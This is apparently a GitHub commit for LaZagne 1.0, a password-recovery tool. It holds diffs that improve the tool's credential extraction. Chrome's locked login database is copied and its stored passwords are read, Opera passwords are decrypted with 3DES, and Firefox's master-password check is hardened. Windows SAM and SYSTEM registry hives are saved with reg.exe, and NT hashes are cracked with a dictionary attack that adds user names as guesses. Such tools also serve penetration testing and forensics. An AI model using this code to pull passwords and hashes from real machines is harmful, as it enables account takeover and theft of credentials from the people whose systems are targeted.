cf changelog 1.0

ra0mb1er · Oct 4, 2015 · 6e24e7c · 6e24e7c
1 parent bc3adb7
commit 6e24e7c
Show file tree

Hide file tree

Showing 12 changed files with 80 additions and 39 deletions.
diff --git a/CHANGELOG b/CHANGELOG
@@ -1,9 +1,19 @@
+LaZagne 1.0 (04/10/2015)
+- Only Windows
+	* Fix chrome database locked
+	* Fix windows secrets bug
+	* Fix opera bug
+
+- For Linux
+	* Fix opera bug
+
+
 LaZagne 0.9.1 (09/07/2015)
 - Only Windows
 	* Fix mastepassword check error - mozilla
 	* Fix database error - mozilla
 
-- For Windows
+- For Linux
 	* Fix encoding error
 
 LaZagne 0.9 (01/07/2015)

diff --git a/Linux/src/config/constant.py b/Linux/src/config/constant.py
@@ -2,7 +2,7 @@
 class constant():
 	folder_name = 'results'
 	MAX_HELP_POSITION = 27
-	CURRENT_VERSION = '0.9.1'
+	CURRENT_VERSION = '1.0'
 	output = None
 	file_logger = None
 	verbose = False

diff --git a/Linux/src/softwares/browsers/opera.py b/Linux/src/softwares/browsers/opera.py
@@ -95,10 +95,13 @@ def decipher_old_version(self, path):
 			data = file[offset + 8 + 4: offset + 8 + 4 + datalen]
 
 			des3dec = DES3.new(key, DES3.MODE_CBC, iv)
-			plaintext = des3dec.decrypt(data)
-
-			plaintext = re.sub(r'[^\x20-\x7e]', '', plaintext)
-			passwords.append(plaintext)
+			try:
+				plaintext = des3dec.decrypt(data)
+				plaintext = re.sub(r'[^\x20-\x7e]', '', plaintext)
+				passwords.append(plaintext)
+			except Exception,e:
+				print_debug('DEBUG', '{0}'.format(e))
+				print_debug('ERROR', 'Failed to decrypt password')
 
 			offset += 8 + 4 + datalen
 		return passwords

diff --git a/Linux/standalone/32bits/LaZagne-32bits b/Linux/standalone/32bits/LaZagne-32bits
diff --git a/Linux/standalone/64bits/LaZagne-64bits b/Linux/standalone/64bits/LaZagne-64bits
diff --git a/Windows/src/LaZagne/config/constant.py b/Windows/src/LaZagne/config/constant.py
@@ -2,7 +2,7 @@
 class constant():
 	folder_name = 'results'
 	MAX_HELP_POSITION = 27
-	CURRENT_VERSION = '0.9.1'
+	CURRENT_VERSION = '1.0'
 	output = None 
 	file_logger = None 
 

diff --git a/Windows/src/LaZagne/softwares/browsers/chrome.py b/Windows/src/LaZagne/softwares/browsers/chrome.py
@@ -1,4 +1,5 @@
 import sqlite3
+import shutil
 import win32crypt
 import sys, os, platform
 from config.constant import *
@@ -36,7 +37,16 @@ def run(self):
 		else:
 			print_debug('ERROR', 'Environment variables (HOMEDRIVE or HOMEPATH) have not been found')
 			return
-
+
+		# Copy database before to query it (bypass lock errors)
+		try:
+			shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
+			database_path = os.getcwd() + os.sep + 'tmp_db'
+
+		except Exception,e:
+			print_debug('DEBUG', '{0}'.format(e))
+			print_debug('ERROR', 'An error occured copying the database file')
+
 		# Connect to the Database
 		try:
 			conn = sqlite3.connect(database_path)
@@ -50,6 +60,7 @@ def run(self):
 		try:
 			cursor.execute('SELECT action_url, username_value, password_value FROM logins')
 		except:
+
 			print_debug('ERROR', 'Google Chrome seems to be used, the database is locked. Kill the process and try again !')
 			return
 
@@ -72,4 +83,8 @@ def run(self):
 
 		# print the results
 		print_output("Chrome", pwdFound)
+
+		conn.close()
+		if database_path.endswith('tmp_db'):
+			os.remove(database_path)
 
diff --git a/Windows/src/LaZagne/softwares/browsers/mozilla.py b/Windows/src/LaZagne/softwares/browsers/mozilla.py
@@ -50,15 +50,16 @@ def __init__(self, profile):
 		super(JsonDatabase, self).__init__(db)
 
 	def __iter__(self):
-		with open(self.db) as fh:
-			data = json.load(fh)
-			try:
-				logins = data["logins"]
-			except:
-				raise Exception("Unrecognized format in {0}".format(self.db))
-
-			for i in logins:
-				yield (i["hostname"], i["encryptedUsername"],	i["encryptedPassword"])
+		if os.path.exists(self.db):
+			with open(self.db) as fh:
+				data = json.load(fh)
+				try:
+					logins = data["logins"]
+				except:
+					raise Exception("Unrecognized format in {0}".format(self.db))
+
+				for i in logins:
+					yield (i["hostname"], i["encryptedUsername"],	i["encryptedPassword"])
 
 class SqliteDatabase(Credentials):
 	def __init__(self, profile):
@@ -329,17 +330,20 @@ def save_db(self, userpath):
 	# ------------------------------ Master Password Functions ------------------------------
 
 	def is_masterpassword_correct(self, masterPassword=''):
-		#see http://www.drh-consultancy.demon.co.uk/key3.html
-		pwdCheck = self.key3['password-check']	
-		entrySaltLen = ord(pwdCheck[1])
-		entrySalt = pwdCheck[3: 3+entrySaltLen]
-		encryptedPasswd = pwdCheck[-16:]
-		globalSalt = self.key3['global-salt']
-		cleartextData = self.decrypt3DES( globalSalt, masterPassword, entrySalt, encryptedPasswd )
-		if cleartextData != 'password-check\x02\x02':
+		try:
+			#see http://www.drh-consultancy.demon.co.uk/key3.html
+			pwdCheck = self.key3['password-check']	
+			entrySaltLen = ord(pwdCheck[1])
+			entrySalt = pwdCheck[3: 3+entrySaltLen]
+			encryptedPasswd = pwdCheck[-16:]
+			globalSalt = self.key3['global-salt']
+			cleartextData = self.decrypt3DES( globalSalt, masterPassword, entrySalt, encryptedPasswd )
+			if cleartextData != 'password-check\x02\x02':
+				return ('', '', '')
+
+			return (globalSalt, masterPassword, entrySalt)
+		except:
 			return ('', '', '')
-
-		return (globalSalt, masterPassword, entrySalt)
 
 	# Retrieve masterpassword
 	def found_masterpassword(self):

diff --git a/Windows/src/LaZagne/softwares/browsers/opera.py b/Windows/src/LaZagne/softwares/browsers/opera.py
@@ -114,10 +114,13 @@ def decipher_old_version(self, path):
 			data = file[offset + 8 + 4: offset + 8 + 4 + datalen]
 
 			des3dec = DES3.new(key, DES3.MODE_CBC, iv)
-			plaintext = des3dec.decrypt(data)
-
-			plaintext = re.sub(r'[^\x20-\x7e]', '', plaintext)
-			passwords.append(plaintext)
+			try:
+				plaintext = des3dec.decrypt(data)
+				plaintext = re.sub(r'[^\x20-\x7e]', '', plaintext)
+				passwords.append(plaintext)
+			except Exception,e:
+				print_debug('DEBUG', '{0}'.format(e))
+				print_debug('ERROR', 'Failed to decrypt password')
 
 			offset += 8 + 4 + datalen
 		return passwords

diff --git a/Windows/src/LaZagne/softwares/windows/secrets.py b/Windows/src/LaZagne/softwares/windows/secrets.py
@@ -47,8 +47,13 @@ def run(self):
 
 		# save system hives
 		for f in self.sysFile:
-			subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read()
-
+			try:
+				subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read()
+			except Exception,e:
+				print_debug('DEBUG', '{0}'.format(e))
+				print_debug('ERROR', 'Failed to save %s hive' % f)
+
+
 		if not self.check_existing_systemFiles():
 			print_debug('WARNING', 'Remove existing hive files and launch it again.')
 			return

diff --git a/Windows/src/LaZagne/softwares/windows/secretsdump.py b/Windows/src/LaZagne/softwares/windows/secretsdump.py
@@ -1043,9 +1043,12 @@ def create_nthash(self, word):
 	def dictionaryAttack_Hash(self, hash):
 		# check using a basic dictionary list and all passwords already found
 		for word in self.wordlist:
-			generated_hash = self.create_nthash(word)
-			if generated_hash == hash:
-				return word
+			try:
+				generated_hash = self.create_nthash(word)
+				if generated_hash == hash:
+					return word
+			except:
+				pass
 		return False
 
 	def bruteFortce_hash(self, hash):
@@ -1100,12 +1103,10 @@ def hashes_to_dic(self, title, format, content):
 		for item in items:
 			hash = content[item]
 			(uid, rid, lmhash, nthash) = hash.split(':')[:4]
-
 			# add the user on the list to found weak password (login equal password)
 			self.wordlist.append(uid.encode("utf8"))
 			all_hash = '%s\r\n%s' % (all_hash, hash)
 			password = self.dictionaryAttack_Hash(nthash)
-
 			if not password and constant.bruteforce:
 				password = self.bruteFortce_hash(nthash)
 
@@ -1116,7 +1117,7 @@ def hashes_to_dic(self, title, format, content):
 				accounts['user'] = uid
 				accounts['password'] = password
 				pwdFound.append(accounts)
-			
+
 		values['hashes'] = all_hash
 		pwdFound.append(values)
 		return pwdFound

diff --git a/Windows/standalone/laZagne.exe b/Windows/standalone/laZagne.exe